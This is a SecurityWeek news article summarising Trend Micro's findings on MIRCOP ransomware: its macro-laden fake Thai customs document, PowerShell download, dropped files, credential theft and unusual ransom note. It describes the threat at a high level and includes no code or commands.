Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, which has been long associated with notorious hacktivist group Anonymous, and offers little instruction on how the victim should pay the ransom. Instead, it suggests that the victim knows how to return the money and that they know who to send the ransom demand to.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of highest seen, but the ransom note threatens that further action will be taken if the victim doesn’t pay, researchers at Trend Micro reveal. The ransom note, however, does mention a Bitcoin address, although it doesn’t offer details on how victims can make crypto-currency transactions. However, no payment has been made to the mentioned address as of now.

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document requests users to enable macros to be able to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.

MIRCOP drops three files in the %Temp% folder: c.exe (a routine that steals information), and x.exe and y.exe (both used to encrypt files). The new threat doesn’t append encrypted files with an extension, as other ransomware families out there do, but prepends files with the string “Lock.” And also encrypts common folders.

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. In this regard, MIRCOP is not the first ransomware to pack info-stealing capabilities, given that CryptXXX has had the feature for over two months now.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the top ransomware out there, courtesy of massive infection campaigns powered by the Necurs botnet.

Related: Bart Ransomware Doesn’t Require C&C Server to Encrypt Files

Written By

Click to comment

Expert Insights

Related Content

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cybercrime

CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.

Cybercrime

Chinese threat actor DragonSpark has been using the SparkRAT open source backdoor in attacks targeting East Asian organizations.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Application Security

Electric car maker Tesla is using the annual Pwn2Own hacker contest to incentivize security researchers to showcase complex exploit chains that can lead to...

Malware & Threats

Cybercrime in 2017 was a tumultuous year "full of twists and turns", with new (but old) infection methods, a major return to social engineering,...

Malware & Threats

Norway‎-based DNV said a ransomware attack on its ship management software impacted 1,000 vessels.

Cybercrime

Security researchers with Juniper Networks’ Threat Labs warn of a new Python-based backdoor targeting VMware ESXi virtualization servers.